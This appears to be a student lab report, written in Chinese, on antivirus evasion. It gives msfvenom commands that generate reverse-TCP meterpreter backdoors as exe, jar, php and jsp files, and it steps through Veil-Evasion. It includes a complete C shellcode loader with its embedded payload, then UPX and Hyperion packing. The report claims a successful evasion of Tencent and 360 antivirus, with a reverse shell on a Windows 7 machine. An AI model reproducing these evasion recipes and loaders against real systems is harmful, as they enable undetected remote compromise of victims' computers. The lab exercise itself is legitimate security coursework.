2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践

免杀的概述

免杀，也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面，英文为Anti-AntiVirus(简写Virus AV)，逐字翻译为"反-反病毒"，翻译为"反杀毒技术"。单从汉语"免杀"的字面意思来理解，可以将其看为一种能使病毒木马避免被杀毒软件查杀的技术。免杀这里有关于免杀的介绍和发展史及一些免杀技巧。

基础问题回答

• 杀软是如何检测出恶意代码的？

1. 恶意代码中一般会有一段有较明显特征的代码也就是特征码，如果杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配，就会把该程序当作恶意软件。
2. 假如程序修改了注册表、修改了权限等恶意行为，就会被杀软查到。

• 免杀是做什么？

1. 通过一些修改技术手段来逃避杀毒软件的检测扫描。

• 免杀的基本方法有哪些？

1. 修改特征码：
   加壳，通过加壳，让杀毒软件无法进行反汇编、逆向工程，进而无法分析代码、对shellcode进行编码、重组。

2. 修改恶意行为：
   多使用反弹式连接，使用加密技术隐藏，加入正常代码来掩盖恶意代码，隧道技术。

   实验内容

   一、正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，加壳工具，使用shellcode编程

   1.1正确使用msf编码器

• 把实验二中生成的后门放入VirusTotal网站下扫描结果如下：
  

• 可以看出不做处理的后门可以被大多数的杀软检测到，那么我们试一下编码后呢：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.16.132 LPORT=5210 -f exe > 20165210-1.exe

• 发现并没有什么卵用，那么我们只好加大量，编码十次，come on！

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.16.132 LPORT=5210 -f exe > 20165210-10.exe

• omg，没什么改变，以为整错了，做了一遍发现还是这样，所以说免杀并不是简简单单就能实现，但是为什么编码降低了检出率还不行呢？AV厂商也不傻，人家研究的是编码器本身，shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中，只要盯住这部分就可以了。

  1.2msfvenom生成如jar之类的其他文件

  - msfvenom生成jar文件

  生成Java后门程序使用命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.16.132 LPORT=5210 x> 20165210_java.jar

扫描如下：

- msfvenom生成php文件

生成PHP后门程序使用命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.16.132 LPORT=5210 x> 20165210_php.php

扫描如下：

- msfvenom生成jsp文件

生成JSP后门程序使用命令：

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.16.132 LPORT=5210 -f raw > 20165210_jsp.jsp

扫描如下：

1.3使用veil-evasion

这里安装参考了学长的博客
如果直接使用

sudo apt-get install veil-evasion

可能会在安装过程中丢失一些压缩包。
可使用以下命令完整安装Veil-Evasion。

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
sudo apt-get update
sudo apt-get install veil-evasion

在终端下输入指令 veil 即可打开软件，按y开始安装，结果如图所示：

根本进行不了，一直卡在16%，要不就是卡在25%，安装失败，只能去拷一下别人的虚拟机了，真的是崩溃，用了成功的虚拟机打开了veil

用

use evasion

命令进入Evil-Evasion

用命令

use c/meterpreter/rev_tcp.py

进入配置界面

设置反弹连接IP，命令为：

set LHOST 192.168.199.198

，注意此处的IP是KaliIP
设置端口，命令为：set LPORT 5210

输入generate生成文件，接着输入你想要playload的名字：playload5210

按照路径找到文件扫描试一下

咦，还不错。

1.4编写注入Shellcode并执行

首先使用命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.198 LPORT=5210 -f

c用c语言生成一段shellcode，创建一个文件20165318.c，然后将unsigned char buf[]赋值到其中，代码如下：

unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc7\xc6"
"\x68\x02\x00\x14\x5a\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";int main()
{int (*func)() = (int(*)())buf;func();
}

使用命令：

i686-w64-mingw32-g++ 20165210.c -o 20165210.exe

编译这个.c文件为可执行文件

然后把可执行文件扫描一下如图：

1.5使用加壳试一下

• 压缩壳（UPX）
  给之前的20165318.exe加个壳得到20165210-jk.exe：

upx 20165210.exe -o 20165210-jk.exe

扫描一下

• 加密壳Hyperion
  将20165210-jk.exe目录/usr/share/windows-binaries/hyperion/中
  输入命令

wine hyperion.exe -v 20165210-jk.exe 20165210_Hyperion.exe

进行加壳

扫描一下

二、通过组合应用各种技术实现恶意代码免杀

首先用C语言生成一段shellcode，然后将C语言文件变成可执行文件，然后进行加壳，先进行压缩壳，然后进行加密壳（具体操作可看上面任务一）
然后进行查杀如图：
360查杀：

腾讯管家查杀：

yeah成功免杀！但是很有趣的是，这些杀软都是只在第一次扫描不出来，你再次查杀是就会被发现，很意外，但是一想这些360什么的软件又不是傻瓜杀软（比如江民杀软哈哈哈哈哈）我觉得可能是什么云病毒的这个特征库的更新有关吧，也不是太清楚。

三、用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

对方电脑的版本：Windows 7x64 虚拟机

杀软名称版本：腾讯管家13.0.19837.233

实验的步骤和上面一样，实现免杀如图：

实现反弹连接：

四、实验的心得与体会

1. 这个实验做得真的是十分的曲折，首先就是安装veil，真的太困难了，真的卡在了展开对象25%那里了，一晚上都没动，重新再安装的时候直接把kali卡黑屏，然后重启kali就一直弹用户名密码进不去，然后再过一会电脑直接蓝屏，omg，直接重启了进入了bios，崩溃，只能再拷一下虚拟机
2. 接下来就是有个疑问就是为什么第一次杀软查不出来，第二次扫描就扫描出来了。
3. 还有就是加壳强！！！哈哈哈
4. 总结